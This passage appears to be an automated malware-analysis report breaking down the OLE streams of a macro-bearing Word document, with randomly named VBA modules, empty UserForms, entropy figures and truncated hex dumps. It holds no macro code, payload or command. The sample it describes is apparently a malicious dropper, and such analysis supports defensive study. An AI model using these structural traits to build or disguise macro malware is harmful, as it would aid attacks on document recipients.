                            VBA File Name:UserForm5
                            Stream Size:1160
                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 f9 39 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            False
                            VB_Exposed
                            Attribute
                            VB_Name
                            VB_Creatable
                            VB_PredeclaredId
                            VB_GlobalNameSpace
                            VB_Base
                            VB_Customizable
                            VB_TemplateDerived
                            VBA Code
                            VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                            General
                            Stream Path:Macros/VBA/Vhr7vb1s1hgs
                            VBA File Name:Vhr7vb1s1hgs
                            Stream Size:681
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 11 c0 94 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                            VBA Code Keywords

                            Keyword
                            Attribute
                            VB_Name
                            VBA Code

                            Streams

                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:\x1CompObj
                            File Type:data
                            Stream Size:114
                            Entropy:4.2359563651
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.252421588676
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 504
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:504
                            Entropy:3.98637824626
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                            Stream Path: 1Table, File Type: data, Stream Size: 7231
                            General
                            Stream Path:1Table
                            File Type:data
                            Stream Size:7231
                            Entropy:5.85333738879
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                            Stream Path: Data, File Type: data, Stream Size: 99195
                            General
                            Stream Path:Data
                            File Type:data
                            Stream Size:99195
                            Entropy:7.38970239713
                            Base64 Encoded:True
                            Data ASCII:{ . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . . . . . . D . . . . . S . . F . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . .
                            Data Raw:7b 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
                            General
                            Stream Path:Macros/PROJECT
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:894
                            Entropy:5.30543445279
                            Base64 Encoded:True
                            Data ASCII:I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
                            Data Raw:49 44 3d 22 7b 39 45 37 34 42 46 36 30 2d 37 31 39 39 2d 34 42 31 32 2d 42 37 34 33 2d 34 34 41 38 46 42 45 45 44 32 33 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d
                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
                            General
                            Stream Path:Macros/PROJECTwm
                            File Type:data
                            Stream Size:278
                            Entropy:3.75500935024
                            Base64 Encoded:False
                            Data ASCII:D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
                            Data Raw:44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 00 44 00 6b 00 35 00 61 00 74 00 74 00 30 00 63 00 75 00 5f 00 39 00 6a 00 73 00 62 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72
                            Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                            General
                            Stream Path:Macros/UserForm1/\x1CompObj
                            File Type:data
                            Stream Size:97
                            Entropy:3.61064918306
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                            General
                            Stream Path:Macros/UserForm1/\x3VBFrame
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:266
                            Entropy:4.62034133633
                            Base64 Encoded:True
                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                            Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                            General
                            Stream Path:Macros/UserForm1/f
                            File Type:data
                            Stream Size:38
                            Entropy:1.54052096453
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                            General
                            Stream Path:Macros/UserForm1/o
                            File Type:empty
                            Stream Size:0
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:
                            Data Raw:
                            Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                            General
                            Stream Path:Macros/UserForm2/\x1CompObj
                            File Type:data
                            Stream Size:97
                            Entropy:3.61064918306
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                            General
                            Stream Path:Macros/UserForm2/\x3VBFrame
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:266
                            Entropy:4.62970308443
                            Base64 Encoded:True
                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                            Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                            General
                            Stream Path:Macros/UserForm2/f
                            File Type:data
                            Stream Size:38
                            Entropy:1.54052096453
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                            General
                            Stream Path:Macros/UserForm2/o
                            File Type:empty
                            Stream Size:0
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:
                            Data Raw:
                            Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                            General
                            Stream Path:Macros/UserForm3/\x1CompObj
                            File Type:data
                            Stream Size:97
                            Entropy:3.61064918306
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                            General
                            Stream Path:Macros/UserForm3/\x3VBFrame
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:266
                            Entropy:4.63438395848
                            Base64 Encoded:True
                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                            Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                            General
                            Stream Path:Macros/UserForm3/f
                            File Type:data
                            Stream Size:38
                            Entropy:1.54052096453
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                            General
                            Stream Path:Macros/UserForm3/o
                            File Type:empty
                            Stream Size:0
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:
                            Data Raw:
                            Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                            General
                            Stream Path:Macros/UserForm4/\x1CompObj
                            File Type:data
                            Stream Size:97
                            Entropy:3.61064918306
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                            General
                            Stream Path:Macros/UserForm4/\x3VBFrame
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:266
                            Entropy:4.62402723855
                            Base64 Encoded:True
                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                            Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                            General
                            Stream Path:Macros/UserForm4/f
                            File Type:data
                            Stream Size:38
                            Entropy:1.54052096453
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                            General
                            Stream Path:Macros/UserForm4/o
                            File Type:empty
                            Stream Size:0
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:
                            Data Raw:
                            Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                            General
                            Stream Path:Macros/UserForm5/\x1CompObj
                            File Type:data
                            Stream Size:97
                            Entropy:3.61064918306
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                            General
                            Stream Path:Macros/UserForm5/\x3VBFrame
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:266
                            Entropy:4.62202697924
                            Base64 Encoded:True
                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                            Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                            General
                            Stream Path:Macros/UserForm5/f
                            File Type:data
                            Stream Size:38
                            Entropy:1.54052096453
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                            General
                            Stream Path:Macros/UserForm5/o
                            File Type:empty
                            Stream Size:0
                            Entropy:0.0
                            Base64 Encoded:False
                            Data ASCII:
                            Data Raw:
                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                            General
                            Stream Path:Macros/VBA/_VBA_PROJECT
                            File Type:data
                            Stream Size:5949
                            Entropy:5.26993168344
                            Base64 Encoded:False
                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                            Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                            General
                            Stream Path:Macros/VBA/dir
                            File Type:data
                            Stream Size:1039
                            Entropy:6.60831708882
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . d . m . . A . ! O f f i c .
                            Data Raw:01 0b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 99 86 d0 61 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                            Stream Path: WordDocument, File Type: data, Stream Size: 43108
                            General
